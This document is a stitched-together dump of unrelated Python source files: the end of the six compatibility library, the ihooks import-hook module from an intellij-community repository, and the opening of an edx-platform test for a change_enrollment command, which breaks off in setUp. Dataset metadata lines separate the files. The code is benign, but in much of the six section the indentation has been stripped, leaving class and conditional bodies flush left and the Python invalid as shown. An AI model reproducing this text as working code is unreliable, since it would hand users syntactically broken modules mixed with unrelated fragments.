Module_six_moves_urllib_parse._moved_attributes = _urllib_parse_moved_attributes
_importer._add_module(Module_six_moves_urllib_parse(__name__ + ".moves.urllib_parse"),
"moves.urllib_parse", "moves.urllib.parse")
class Module_six_moves_urllib_error(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_error"""
_urllib_error_moved_attributes = [
MovedAttribute("URLError", "urllib2", "urllib.error"),
MovedAttribute("HTTPError", "urllib2", "urllib.error"),
MovedAttribute("ContentTooShortError", "urllib", "urllib.error"),
]
for attr in _urllib_error_moved_attributes:
setattr(Module_six_moves_urllib_error, attr.name, attr)
del attr
Module_six_moves_urllib_error._moved_attributes = _urllib_error_moved_attributes
_importer._add_module(Module_six_moves_urllib_error(__name__ + ".moves.urllib.error"),
"moves.urllib_error", "moves.urllib.error")
class Module_six_moves_urllib_request(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_request"""
_urllib_request_moved_attributes = [
MovedAttribute("urlopen", "urllib2", "urllib.request"),
MovedAttribute("install_opener", "urllib2", "urllib.request"),
MovedAttribute("build_opener", "urllib2", "urllib.request"),
MovedAttribute("pathname2url", "urllib", "urllib.request"),
MovedAttribute("url2pathname", "urllib", "urllib.request"),
MovedAttribute("getproxies", "urllib", "urllib.request"),
MovedAttribute("Request", "urllib2", "urllib.request"),
MovedAttribute("OpenerDirector", "urllib2", "urllib.request"),
MovedAttribute("HTTPDefaultErrorHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPRedirectHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPCookieProcessor", "urllib2", "urllib.request"),
MovedAttribute("ProxyHandler", "urllib2", "urllib.request"),
MovedAttribute("BaseHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPPasswordMgr", "urllib2", "urllib.request"),
MovedAttribute("HTTPPasswordMgrWithDefaultRealm", "urllib2", "urllib.request"),
MovedAttribute("AbstractBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("ProxyBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("AbstractDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("ProxyDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPSHandler", "urllib2", "urllib.request"),
MovedAttribute("FileHandler", "urllib2", "urllib.request"),
MovedAttribute("FTPHandler", "urllib2", "urllib.request"),
MovedAttribute("CacheFTPHandler", "urllib2", "urllib.request"),
MovedAttribute("UnknownHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPErrorProcessor", "urllib2", "urllib.request"),
MovedAttribute("urlretrieve", "urllib", "urllib.request"),
MovedAttribute("urlcleanup", "urllib", "urllib.request"),
MovedAttribute("URLopener", "urllib", "urllib.request"),
MovedAttribute("FancyURLopener", "urllib", "urllib.request"),
MovedAttribute("proxy_bypass", "urllib", "urllib.request"),
]
for attr in _urllib_request_moved_attributes:
setattr(Module_six_moves_urllib_request, attr.name, attr)
del attr
Module_six_moves_urllib_request._moved_attributes = _urllib_request_moved_attributes
_importer._add_module(Module_six_moves_urllib_request(__name__ + ".moves.urllib.request"),
"moves.urllib_request", "moves.urllib.request")
class Module_six_moves_urllib_response(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_response"""
_urllib_response_moved_attributes = [
MovedAttribute("addbase", "urllib", "urllib.response"),
MovedAttribute("addclosehook", "urllib", "urllib.response"),
MovedAttribute("addinfo", "urllib", "urllib.response"),
MovedAttribute("addinfourl", "urllib", "urllib.response"),
]
for attr in _urllib_response_moved_attributes:
setattr(Module_six_moves_urllib_response, attr.name, attr)
del attr
Module_six_moves_urllib_response._moved_attributes = _urllib_response_moved_attributes
_importer._add_module(Module_six_moves_urllib_response(__name__ + ".moves.urllib.response"),
"moves.urllib_response", "moves.urllib.response")
class Module_six_moves_urllib_robotparser(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_robotparser"""
_urllib_robotparser_moved_attributes = [
MovedAttribute("RobotFileParser", "robotparser", "urllib.robotparser"),
]
for attr in _urllib_robotparser_moved_attributes:
setattr(Module_six_moves_urllib_robotparser, attr.name, attr)
del attr
Module_six_moves_urllib_robotparser._moved_attributes = _urllib_robotparser_moved_attributes
_importer._add_module(Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib.robotparser"),
"moves.urllib_robotparser", "moves.urllib.robotparser")
class Module_six_moves_urllib(types.ModuleType):
"""Create a six.moves.urllib namespace that resembles the Python 3 namespace"""
__path__ = [] # mark as package
parse = _importer._get_module("moves.urllib_parse")
error = _importer._get_module("moves.urllib_error")
request = _importer._get_module("moves.urllib_request")
response = _importer._get_module("moves.urllib_response")
robotparser = _importer._get_module("moves.urllib_robotparser")
def __dir__(self):
return ['parse', 'error', 'request', 'response', 'robotparser']
_importer._add_module(Module_six_moves_urllib(__name__ + ".moves.urllib"),
"moves.urllib")
def add_move(move):
    """Register *move* as an attribute of the six.moves namespace."""
    name = move.name
    setattr(_MovedItems, name, move)
def remove_move(name):
    """Remove the item named *name* from six.moves.

    Raises AttributeError if no such move exists.
    """
    # Prefer the class-level descriptor; fall back to a value cached on
    # the module instance dict by a previous access.
    try:
        delattr(_MovedItems, name)
        return
    except AttributeError:
        pass
    try:
        del moves.__dict__[name]
    except KeyError:
        raise AttributeError("no such move, %r" % (name,))
if PY3:
_meth_func = "__func__"
_meth_self = "__self__"
_func_closure = "__closure__"
_func_code = "__code__"
_func_defaults = "__defaults__"
_func_globals = "__globals__"
else:
_meth_func = "im_func"
_meth_self = "im_self"
_func_closure = "func_closure"
_func_code = "func_code"
_func_defaults = "func_defaults"
_func_globals = "func_globals"
try:
advance_iterator = next
except NameError:
def advance_iterator(it):
return it.next()
next = advance_iterator
try:
callable = callable
except NameError:
def callable(obj):
return any("__call__" in klass.__dict__ for klass in type(obj).__mro__)
if PY3:
def get_unbound_function(unbound):
return unbound
create_bound_method = types.MethodType
def create_unbound_method(func, cls):
return func
Iterator = object
else:
def get_unbound_function(unbound):
return unbound.im_func
def create_bound_method(func, obj):
return types.MethodType(func, obj, obj.__class__)
def create_unbound_method(func, cls):
return types.MethodType(func, None, cls)
class Iterator(object):
def next(self):
return type(self).__next__(self)
callable = callable
_add_doc(get_unbound_function,
"""Get the function out of a possibly unbound function""")
get_method_function = operator.attrgetter(_meth_func)
get_method_self = operator.attrgetter(_meth_self)
get_function_closure = operator.attrgetter(_func_closure)
get_function_code = operator.attrgetter(_func_code)
get_function_defaults = operator.attrgetter(_func_defaults)
get_function_globals = operator.attrgetter(_func_globals)
if PY3:
def iterkeys(d, **kw):
return iter(d.keys(**kw))
def itervalues(d, **kw):
return iter(d.values(**kw))
def iteritems(d, **kw):
return iter(d.items(**kw))
def iterlists(d, **kw):
return iter(d.lists(**kw))
viewkeys = operator.methodcaller("keys")
viewvalues = operator.methodcaller("values")
viewitems = operator.methodcaller("items")
else:
def iterkeys(d, **kw):
return d.iterkeys(**kw)
def itervalues(d, **kw):
return d.itervalues(**kw)
def iteritems(d, **kw):
return d.iteritems(**kw)
def iterlists(d, **kw):
return d.iterlists(**kw)
viewkeys = operator.methodcaller("viewkeys")
viewvalues = operator.methodcaller("viewvalues")
viewitems = operator.methodcaller("viewitems")
_add_doc(iterkeys, "Return an iterator over the keys of a dictionary.")
_add_doc(itervalues, "Return an iterator over the values of a dictionary.")
_add_doc(iteritems,
"Return an iterator over the (key, value) pairs of a dictionary.")
_add_doc(iterlists,
"Return an iterator over the (key, [values]) pairs of a dictionary.")
if PY3:
def b(s):
return s.encode("latin-1")
def u(s):
return s
unichr = chr
import struct
int2byte = struct.Struct(">B").pack
del struct
byte2int = operator.itemgetter(0)
indexbytes = operator.getitem
iterbytes = iter
import io
StringIO = io.StringIO
BytesIO = io.BytesIO
_assertCountEqual = "assertCountEqual"
if sys.version_info[1] <= 1:
_assertRaisesRegex = "assertRaisesRegexp"
_assertRegex = "assertRegexpMatches"
else:
_assertRaisesRegex = "assertRaisesRegex"
_assertRegex = "assertRegex"
else:
def b(s):
return s
# Workaround for standalone backslash
def u(s):
return unicode(s.replace(r'\\', r'\\\\'), "unicode_escape")
unichr = unichr
int2byte = chr
def byte2int(bs):
return ord(bs[0])
def indexbytes(buf, i):
return ord(buf[i])
iterbytes = functools.partial(itertools.imap, ord)
import StringIO
StringIO = BytesIO = StringIO.StringIO
_assertCountEqual = "assertItemsEqual"
_assertRaisesRegex = "assertRaisesRegexp"
_assertRegex = "assertRegexpMatches"
_add_doc(b, """Byte literal""")
_add_doc(u, """Text literal""")
def assertCountEqual(self, *args, **kwargs):
return getattr(self, _assertCountEqual)(*args, **kwargs)
def assertRaisesRegex(self, *args, **kwargs):
return getattr(self, _assertRaisesRegex)(*args, **kwargs)
def assertRegex(self, *args, **kwargs):
return getattr(self, _assertRegex)(*args, **kwargs)
# exec_ and reraise must be defined per-version: `exec` and the
# three-argument raise are statements on Python 2, so the Python-2 forms are
# hidden inside string literals to keep this file importable on Python 3.
if PY3:
    exec_ = getattr(moves.builtins, "exec")
    def reraise(tp, value, tb=None):
        if value is None:
            value = tp()
        if value.__traceback__ is not tb:
            raise value.with_traceback(tb)
        raise value
else:
    def exec_(_code_, _globs_=None, _locs_=None):
        """Execute code in a namespace."""
        if _globs_ is None:
            # Default to the caller's globals/locals, like the exec statement.
            frame = sys._getframe(1)
            _globs_ = frame.f_globals
            if _locs_ is None:
                _locs_ = frame.f_locals
            del frame
        elif _locs_ is None:
            _locs_ = _globs_
        exec("""exec _code_ in _globs_, _locs_""")
    exec_("""def reraise(tp, value, tb=None):
    raise tp, value, tb
""")
# raise_from: `raise x from y` is a syntax error before 3.0 (and the
# None-cause form misbehaves on exactly 3.2), so the 3.x bodies are compiled
# via exec_ and Python 2 falls back to a plain raise.
if sys.version_info[:2] == (3, 2):
    exec_("""def raise_from(value, from_value):
    if from_value is None:
        raise value
    raise value from from_value
""")
elif sys.version_info[:2] > (3, 2):
    exec_("""def raise_from(value, from_value):
    raise value from from_value
""")
else:
    def raise_from(value, from_value):
        # Python 2 has no exception chaining; the cause is dropped.
        raise value
# print_: use the builtin print function when one exists; otherwise emulate
# it (Python 2.4/2.5 have neither the function nor `from __future__ import
# print_function`).
print_ = getattr(moves.builtins, "print", None)
if print_ is None:
    def print_(*args, **kwargs):
        """The new-style print function for Python 2.4 and 2.5."""
        fp = kwargs.pop("file", sys.stdout)
        if fp is None:
            return
        def write(data):
            if not isinstance(data, basestring):
                data = str(data)
            # If the file has an encoding, encode unicode with it.
            if (isinstance(fp, file) and
                isinstance(data, unicode) and
                fp.encoding is not None):
                errors = getattr(fp, "errors", None)
                if errors is None:
                    errors = "strict"
                data = data.encode(fp.encoding, errors)
            fp.write(data)
        # If any argument or separator is unicode, the whole line is written
        # as unicode to avoid implicit str/unicode coercion errors.
        want_unicode = False
        sep = kwargs.pop("sep", None)
        if sep is not None:
            if isinstance(sep, unicode):
                want_unicode = True
            elif not isinstance(sep, str):
                raise TypeError("sep must be None or a string")
        end = kwargs.pop("end", None)
        if end is not None:
            if isinstance(end, unicode):
                want_unicode = True
            elif not isinstance(end, str):
                raise TypeError("end must be None or a string")
        if kwargs:
            raise TypeError("invalid keyword arguments to print()")
        if not want_unicode:
            for arg in args:
                if isinstance(arg, unicode):
                    want_unicode = True
                    break
        if want_unicode:
            newline = unicode("\n")
            space = unicode(" ")
        else:
            newline = "\n"
            space = " "
        if sep is None:
            sep = space
        if end is None:
            end = newline
        for i, arg in enumerate(args):
            if i:
                write(sep)
            write(arg)
        write(end)
if sys.version_info[:2] < (3, 3):
    # Before 3.3 the builtin print has no flush= keyword; wrap it.
    _print = print_
    def print_(*args, **kwargs):
        fp = kwargs.get("file", sys.stdout)
        flush = kwargs.pop("flush", False)
        _print(*args, **kwargs)
        if flush and fp is not None:
            fp.flush()
_add_doc(reraise, """Reraise an exception.""")
# Before 3.4, functools.wraps did not set __wrapped__ on the wrapper; add it
# here so introspection tools behave the same on all supported versions.
if sys.version_info[0:2] < (3, 4):
    def wraps(wrapped, assigned=functools.WRAPPER_ASSIGNMENTS,
              updated=functools.WRAPPER_UPDATES):
        def wrapper(f):
            f = functools.wraps(wrapped, assigned, updated)(f)
            f.__wrapped__ = wrapped
            return f
        return wrapper
else:
    wraps = functools.wraps
def with_metaclass(meta, *bases):
    """Create a base class with a metaclass.

    Returns a throwaway base class; when a real class is derived from it,
    the dummy metaclass below intercepts class creation and rebuilds the
    class with the requested metaclass *meta* and bases *bases*, so the
    dummy never appears in the final MRO.
    """
    class _TemporaryMeta(meta):
        def __new__(mcls, name, this_bases, namespace):
            # Discard the dummy base (this_bases) and build the real class.
            return meta(name, bases, namespace)
    # type.__new__ (not a normal call) so _TemporaryMeta.__new__ is NOT
    # invoked while creating the dummy base itself.
    return type.__new__(_TemporaryMeta, 'temporary_class', (), {})
def add_metaclass(metaclass):
    """Class decorator for creating a class with a metaclass.

    Rebuilds the decorated class through *metaclass*, copying its namespace
    but dropping the descriptors the interpreter created for the original
    class (slot descriptors, __dict__, __weakref__) so they are recreated
    cleanly for the new class object.
    """
    def wrapper(cls):
        body = dict(cls.__dict__)
        declared_slots = body.get('__slots__')
        if declared_slots is not None:
            # __slots__ may be a single name or an iterable of names.
            names = [declared_slots] if isinstance(declared_slots, str) \
                else declared_slots
            for slot_name in names:
                body.pop(slot_name)
        for implicit in ('__dict__', '__weakref__'):
            body.pop(implicit, None)
        return metaclass(cls.__name__, cls.__bases__, body)
    return wrapper
def python_2_unicode_compatible(klass):
    """
    A decorator that defines __unicode__ and __str__ methods under Python 2.
    Under Python 3 it does nothing.
    To support Python 2 and 3 with a single code base, define a __str__ method
    returning text and apply this decorator to the class.
    """
    if not PY2:
        # Python 3: str already returns text; nothing to adapt.
        return klass
    if '__str__' not in klass.__dict__:
        raise ValueError("@python_2_unicode_compatible cannot be applied "
                         "to %s because it doesn't define __str__()." %
                         klass.__name__)
    # Move the text-returning __str__ to __unicode__ and make __str__
    # return UTF-8 bytes, matching Python 2 expectations.
    klass.__unicode__ = klass.__str__
    klass.__str__ = lambda self: self.__unicode__().encode('utf-8')
    return klass
# Complete the moves implementation.
# This code is at the end of this module to speed up module loading.
# Turn this module into a package.
__path__ = []  # required for PEP 302 and PEP 451
__package__ = __name__  # see PEP 366 @ReservedAssignment
if globals().get("__spec__") is not None:
    __spec__.submodule_search_locations = []  # PEP 451 @UndefinedVariable
# Remove other six meta path importers, since they cause problems. This can
# happen if six is removed from sys.modules and then reloaded. (Setuptools does
# this for some reason.)
if sys.meta_path:
    for i, importer in enumerate(sys.meta_path):
        # Here's some real nastiness: Another "instance" of the six module might
        # be floating around. Therefore, we can't use isinstance() to check for
        # the six meta path importer, since the other six instance will have
        # inserted an importer with different class.
        if (type(importer).__name__ == "_SixMetaPathImporter" and
                importer.name == __name__):
            del sys.meta_path[i]
            break
    del i, importer
# Finally, add the importer to the meta path import hook.
sys.meta_path.append(_importer)
| apache-2.0 |
xfournet/intellij-community | python/lib/Lib/ihooks.py | 100 | 17335 | """Import hook support.
Consistent use of this module will make it possible to change the
different mechanisms involved in loading modules independently.
While the built-in module imp exports interfaces to the built-in
module searching and loading algorithm, and it is possible to replace
the built-in function __import__ in order to change the semantics of
the import statement, until now it has been difficult to combine the
effect of different __import__ hacks, like loading modules from URLs
by rimport.py, or restricted execution by rexec.py.
This module defines three new concepts:
1) A "file system hooks" class provides an interface to a filesystem.
One hooks class is defined (Hooks), which uses the interface provided
by standard modules os and os.path. It should be used as the base
class for other hooks classes.
2) A "module loader" class provides an interface to search for a
module in a search path and to load it. It defines a method which
searches for a module in a single directory; by overriding this method
one can redefine the details of the search. If the directory is None,
built-in and frozen modules are searched instead.
Two module loader class are defined, both implementing the search
strategy used by the built-in __import__ function: ModuleLoader uses
the imp module's find_module interface, while HookableModuleLoader
uses a file system hooks class to interact with the file system. Both
use the imp module's load_* interfaces to actually load the module.
3) A "module importer" class provides an interface to import a
module, as well as interfaces to reload and unload a module. It also
provides interfaces to install and uninstall itself instead of the
default __import__ and reload (and unload) functions.
One module importer class is defined (ModuleImporter), which uses a
module loader instance passed in (by default HookableModuleLoader is
instantiated).
The classes defined here should be used as base classes for extended
functionality along those lines.
If a module importer class supports dotted names, its import_module()
must return a different value depending on whether it is called on
behalf of a "from ... import ..." statement or not. (This is caused
by the way the __import__ hook is used by the Python interpreter.) It
would also do wise to install a different version of reload().
"""
import __builtin__
import imp
import os
import sys
# Public API of the ihooks module.
__all__ = ["BasicModuleLoader","Hooks","ModuleLoader","FancyModuleLoader",
           "BasicModuleImporter","ModuleImporter","install","uninstall"]
# Default verbosity for _Verbose subclasses (0 = silent).
VERBOSE = 0
from imp import C_EXTENSION, PY_SOURCE, PY_COMPILED
from imp import C_BUILTIN, PY_FROZEN, PKG_DIRECTORY
# Friendlier aliases for the imp module-type constants used below.
BUILTIN_MODULE = C_BUILTIN
FROZEN_MODULE = PY_FROZEN
class _Verbose:
    """Mix-in providing a verbosity flag plus conditional message printing."""
    def __init__(self, verbose = VERBOSE):
        self.verbose = verbose
    def get_verbose(self):
        return self.verbose
    def set_verbose(self, verbose):
        self.verbose = verbose
    # XXX The following is an experimental interface
    def note(self, *args):
        # Emit a message only when verbose mode is on.
        if self.verbose:
            self.message(*args)
    def message(self, format, *args):
        # %-format only when args were supplied, so literal '%' in a plain
        # message does not raise.
        if args:
            print format%args
        else:
            print format
class BasicModuleLoader(_Verbose):
    """Basic module loader.
    This provides the same functionality as built-in import. It
    doesn't deal with checking sys.modules -- all it provides is
    find_module() and a load_module(), as well as find_module_in_dir()
    which searches just one directory, and can be overridden by a
    derived class to change the module search algorithm when the basic
    dependency on sys.path is unchanged.
    The interface is a little more convenient than imp's:
    find_module(name, [path]) returns None or 'stuff', and
    load_module(name, stuff) loads the module.
    """
    def find_module(self, name, path = None):
        # The leading None entry stands for "builtin/frozen modules".
        if path is None:
            path = [None] + self.default_path()
        for dir in path:
            stuff = self.find_module_in_dir(name, dir)
            if stuff: return stuff
        return None
    def default_path(self):
        return sys.path
    def find_module_in_dir(self, name, dir):
        if dir is None:
            return self.find_builtin_module(name)
        else:
            try:
                return imp.find_module(name, [dir])
            except ImportError:
                return None
    def find_builtin_module(self, name):
        # XXX frozen packages?
        # Returns an imp-style (file, filename, info) triple with no file.
        if imp.is_builtin(name):
            return None, '', ('', '', BUILTIN_MODULE)
        if imp.is_frozen(name):
            return None, '', ('', '', FROZEN_MODULE)
        return None
    def load_module(self, name, stuff):
        file, filename, info = stuff
        try:
            return imp.load_module(name, file, filename, info)
        finally:
            # Always close the file handle returned by find_module.
            if file: file.close()
class Hooks(_Verbose):
    """Hooks into the filesystem and interpreter.
    By deriving a subclass you can redefine your filesystem interface,
    e.g. to merge it with the URL space.
    This base class behaves just like the native filesystem.
    """
    # imp interface: thin pass-throughs to the imp module.
    def get_suffixes(self): return imp.get_suffixes()
    def new_module(self, name): return imp.new_module(name)
    def is_builtin(self, name): return imp.is_builtin(name)
    def init_builtin(self, name): return imp.init_builtin(name)
    def is_frozen(self, name): return imp.is_frozen(name)
    def init_frozen(self, name): return imp.init_frozen(name)
    def get_frozen_object(self, name): return imp.get_frozen_object(name)
    def load_source(self, name, filename, file=None):
        return imp.load_source(name, filename, file)
    def load_compiled(self, name, filename, file=None):
        return imp.load_compiled(name, filename, file)
    def load_dynamic(self, name, filename, file=None):
        return imp.load_dynamic(name, filename, file)
    def load_package(self, name, filename, file=None):
        return imp.load_module(name, file, filename, ("", "", PKG_DIRECTORY))
    def add_module(self, name):
        # Return the existing module of that name, or create and register one.
        d = self.modules_dict()
        if name in d: return d[name]
        d[name] = m = self.new_module(name)
        return m
    # sys interface
    def modules_dict(self): return sys.modules
    def default_path(self): return sys.path
    def path_split(self, x): return os.path.split(x)
    def path_join(self, x, y): return os.path.join(x, y)
    def path_isabs(self, x): return os.path.isabs(x)
    # etc.
    def path_exists(self, x): return os.path.exists(x)
    def path_isdir(self, x): return os.path.isdir(x)
    def path_isfile(self, x): return os.path.isfile(x)
    def path_islink(self, x): return os.path.islink(x)
    # etc.
    def openfile(self, *x): return open(*x)
    openfile_error = IOError
    def listdir(self, x): return os.listdir(x)
    listdir_error = os.error
    # etc.
class ModuleLoader(BasicModuleLoader):
    """Default module loader; uses file system hooks.
    By defining suitable hooks, you might be able to load modules from
    other sources than the file system, e.g. from compressed or
    encrypted files, tar files or (if you're brave!) URLs.
    """
    def __init__(self, hooks = None, verbose = VERBOSE):
        BasicModuleLoader.__init__(self, verbose)
        self.hooks = hooks or Hooks(verbose)
    def default_path(self):
        return self.hooks.default_path()
    def modules_dict(self):
        return self.hooks.modules_dict()
    def get_hooks(self):
        return self.hooks
    def set_hooks(self, hooks):
        self.hooks = hooks
    def find_builtin_module(self, name):
        # XXX frozen packages?
        if self.hooks.is_builtin(name):
            return None, '', ('', '', BUILTIN_MODULE)
        if self.hooks.is_frozen(name):
            return None, '', ('', '', FROZEN_MODULE)
        return None
    def find_module_in_dir(self, name, dir, allow_packages=1):
        if dir is None:
            return self.find_builtin_module(name)
        if allow_packages:
            # A directory containing an __init__ module is a package.
            fullname = self.hooks.path_join(dir, name)
            if self.hooks.path_isdir(fullname):
                stuff = self.find_module_in_dir("__init__", fullname, 0)
                if stuff:
                    file = stuff[0]
                    if file: file.close()
                    return None, fullname, ('', '', PKG_DIRECTORY)
        # Try each recognized suffix (e.g. .py, .pyc, extension modules).
        for info in self.hooks.get_suffixes():
            suff, mode, type = info
            fullname = self.hooks.path_join(dir, name+suff)
            try:
                fp = self.hooks.openfile(fullname, mode)
                return fp, fullname, info
            except self.hooks.openfile_error:
                pass
        return None
    def load_module(self, name, stuff):
        file, filename, info = stuff
        (suff, mode, type) = info
        try:
            if type == BUILTIN_MODULE:
                return self.hooks.init_builtin(name)
            if type == FROZEN_MODULE:
                return self.hooks.init_frozen(name)
            if type == C_EXTENSION:
                m = self.hooks.load_dynamic(name, filename, file)
            elif type == PY_SOURCE:
                m = self.hooks.load_source(name, filename, file)
            elif type == PY_COMPILED:
                m = self.hooks.load_compiled(name, filename, file)
            elif type == PKG_DIRECTORY:
                m = self.hooks.load_package(name, filename, file)
            else:
                raise ImportError, "Unrecognized module type (%r) for %s" % \
                      (type, name)
        finally:
            # Close the file even if loading raised.
            if file: file.close()
        m.__file__ = filename
        return m
class FancyModuleLoader(ModuleLoader):
    """Fancy module loader -- parses and execs the code itself."""
    def load_module(self, name, stuff):
        file, filename, (suff, mode, type) = stuff
        realfilename = filename
        path = None
        if type == PKG_DIRECTORY:
            # Resolve a package to its __init__ module and load that instead.
            initstuff = self.find_module_in_dir("__init__", filename, 0)
            if not initstuff:
                raise ImportError, "No __init__ module in package %s" % name
            initfile, initfilename, initinfo = initstuff
            initsuff, initmode, inittype = initinfo
            if inittype not in (PY_COMPILED, PY_SOURCE):
                if initfile: initfile.close()
                raise ImportError, \
                      "Bad type (%r) for __init__ module in package %s" % (
                      inittype, name)
            path = [filename]
            file = initfile
            realfilename = initfilename
            type = inittype
        # Obtain a code object for the module body.
        if type == FROZEN_MODULE:
            code = self.hooks.get_frozen_object(name)
        elif type == PY_COMPILED:
            import marshal
            file.seek(8)  # skip the .pyc header before the marshalled code
            code = marshal.load(file)
        elif type == PY_SOURCE:
            data = file.read()
            code = compile(data, realfilename, 'exec')
        else:
            # Extension modules etc. fall back to the base implementation.
            return ModuleLoader.load_module(self, name, stuff)
        m = self.hooks.add_module(name)
        if path:
            m.__path__ = path
        m.__file__ = filename
        try:
            exec code in m.__dict__
        except:
            # Execution failed: remove the half-initialized module entry
            # before propagating the error.
            d = self.hooks.modules_dict()
            if name in d:
                del d[name]
            raise
        return m
class BasicModuleImporter(_Verbose):
    """Basic module importer; uses module loader.
    This provides basic import facilities but no package imports.
    """
    def __init__(self, loader = None, verbose = VERBOSE):
        _Verbose.__init__(self, verbose)
        self.loader = loader or ModuleLoader(None, verbose)
        self.modules = self.loader.modules_dict()
    def get_loader(self):
        return self.loader
    def set_loader(self, loader):
        self.loader = loader
    def get_hooks(self):
        return self.loader.get_hooks()
    def set_hooks(self, hooks):
        return self.loader.set_hooks(hooks)
    def import_module(self, name, globals={}, locals={}, fromlist=[]):
        name = str(name)
        if name in self.modules:
            return self.modules[name] # Fast path
        stuff = self.loader.find_module(name)
        if not stuff:
            raise ImportError, "No module named %s" % name
        return self.loader.load_module(name, stuff)
    def reload(self, module, path = None):
        name = str(module.__name__)
        stuff = self.loader.find_module(name, path)
        if not stuff:
            raise ImportError, "Module %s not found for reload" % name
        return self.loader.load_module(name, stuff)
    def unload(self, module):
        del self.modules[str(module.__name__)]
        # XXX Should this try to clear the module's namespace?
    def install(self):
        # Save the current builtins so uninstall() can restore them, then
        # replace __import__/reload (and add unload) with our methods.
        self.save_import_module = __builtin__.__import__
        self.save_reload = __builtin__.reload
        if not hasattr(__builtin__, 'unload'):
            __builtin__.unload = None
        self.save_unload = __builtin__.unload
        __builtin__.__import__ = self.import_module
        __builtin__.reload = self.reload
        __builtin__.unload = self.unload
    def uninstall(self):
        # Restore the builtins saved by install().
        __builtin__.__import__ = self.save_import_module
        __builtin__.reload = self.save_reload
        __builtin__.unload = self.save_unload
        if not __builtin__.unload:
            del __builtin__.unload
class ModuleImporter(BasicModuleImporter):
    """A module importer that supports packages."""
    def import_module(self, name, globals=None, locals=None, fromlist=None):
        # Mirrors the __import__ protocol: return the head package for a
        # plain import, the tail module for "from ... import ...".
        parent = self.determine_parent(globals)
        q, tail = self.find_head_package(parent, str(name))
        m = self.load_tail(q, tail)
        if not fromlist:
            return q
        if hasattr(m, "__path__"):
            self.ensure_fromlist(m, fromlist)
        return m
    def determine_parent(self, globals):
        # Infer the importing package from the caller's globals, for
        # resolving relative (implicit) imports.
        if not globals or not "__name__" in globals:
            return None
        pname = globals['__name__']
        if "__path__" in globals:
            # Caller is a package's __init__; it is its own parent.
            parent = self.modules[pname]
            assert globals is parent.__dict__
            return parent
        if '.' in pname:
            i = pname.rfind('.')
            pname = pname[:i]
            parent = self.modules[pname]
            assert parent.__name__ == pname
            return parent
        return None
    def find_head_package(self, parent, name):
        # Split off the first dotted component and import it, first
        # relative to parent, then as a top-level module.
        if '.' in name:
            i = name.find('.')
            head = name[:i]
            tail = name[i+1:]
        else:
            head = name
            tail = ""
        if parent:
            qname = "%s.%s" % (parent.__name__, head)
        else:
            qname = head
        q = self.import_it(head, qname, parent)
        if q: return q, tail
        if parent:
            qname = head
            parent = None
            q = self.import_it(head, qname, parent)
            if q: return q, tail
        raise ImportError, "No module named " + qname
    def load_tail(self, q, tail):
        # Import each remaining dotted component under the head package.
        m = q
        while tail:
            i = tail.find('.')
            if i < 0: i = len(tail)
            head, tail = tail[:i], tail[i+1:]
            mname = "%s.%s" % (m.__name__, head)
            m = self.import_it(head, mname, m)
            if not m:
                raise ImportError, "No module named " + mname
        return m
    def ensure_fromlist(self, m, fromlist, recursive=0):
        # Make sure every name in a "from pkg import ..." list that refers
        # to a submodule is actually imported ('*' expands via __all__).
        for sub in fromlist:
            if sub == "*":
                if not recursive:
                    try:
                        all = m.__all__
                    except AttributeError:
                        pass
                    else:
                        self.ensure_fromlist(m, all, 1)
                continue
            if sub != "*" and not hasattr(m, sub):
                subname = "%s.%s" % (m.__name__, sub)
                submod = self.import_it(sub, subname, m)
                if not submod:
                    raise ImportError, "No module named " + subname
    def import_it(self, partname, fqname, parent, force_load=0):
        # Import a single component; returns None (rather than raising)
        # when the module cannot be found, so callers can fall back.
        if not partname:
            raise ValueError, "Empty module name"
        if not force_load:
            try:
                return self.modules[fqname]
            except KeyError:
                pass
        try:
            path = parent and parent.__path__
        except AttributeError:
            return None
        partname = str(partname)
        stuff = self.loader.find_module(partname, path)
        if not stuff:
            return None
        fqname = str(fqname)
        m = self.loader.load_module(fqname, stuff)
        if parent:
            setattr(parent, partname, m)
        return m
    def reload(self, module):
        name = str(module.__name__)
        if '.' not in name:
            return self.import_it(name, name, None, force_load=1)
        i = name.rfind('.')
        pname = name[:i]
        parent = self.modules[pname]
        return self.import_it(name[i+1:], name, parent, force_load=1)
# Module-level registry of the active importer used by install()/uninstall().
default_importer = None
current_importer = None
def install(importer = None):
    # Install the given importer (or the default, or a fresh ModuleImporter)
    # as the process-wide import hook.
    global current_importer
    current_importer = importer or default_importer or ModuleImporter()
    current_importer.install()
def uninstall():
    # Restore the builtins saved when the current importer was installed.
    global current_importer
    current_importer.uninstall()
| apache-2.0 |
pepeportela/edx-platform | common/djangoapps/student/management/tests/test_change_enrollment.py | 44 | 4210 | """ Test the change_enrollment command line script."""
import ddt
from mock import patch
from django.core.management import call_command
from xmodule.modulestore.tests.factories import CourseFactory
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from student.tests.factories import UserFactory, CourseModeFactory
from student.models import CourseEnrollment
@ddt.ddt
class ChangeEnrollmentTests(SharedModuleStoreTestCase):
    """ Test the enrollment change functionality of the change_enrollment script."""
    def setUp(self):
        # Build a course with 'audit' and 'honor' modes and three users
        # enrolled in the 'audit' mode; the tests below move them to 'honor'.
        super(ChangeEnrollmentTests, self).setUp()
        self.course = CourseFactory.create()
        self.audit_mode = CourseModeFactory.create(
            course_id=self.course.id,
            mode_slug='audit',
            mode_display_name='Audit',
        )
        self.honor_mode = CourseModeFactory.create(
            course_id=self.course.id,
            mode_slug='honor',
            mode_display_name='Honor',
        )
        self.user_info = [
            ('amy', 'amy@pond.com', 'password'),
            ('rory', 'rory@theroman.com', 'password'),
            ('river', 'river@song.com', 'password')
        ]
        self.enrollments = []
        self.users = []
        for username, email, password in self.user_info:
